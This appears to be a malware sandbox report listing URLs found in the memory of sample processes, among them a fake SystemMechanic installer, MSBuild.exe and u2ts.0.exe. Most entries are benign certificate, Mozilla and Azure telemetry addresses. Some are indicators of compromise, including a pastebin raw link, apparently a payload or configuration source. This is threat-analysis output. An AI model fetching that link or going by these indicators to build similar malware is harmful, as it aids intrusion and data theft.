Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: http://compositewpf.codeplex.com/
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://monitor.azure.com//.default
Source: freebl3.dll.2.dr String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rt.services.visualstudio.com/0l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.comrent
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/about/DHJKKEGI
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
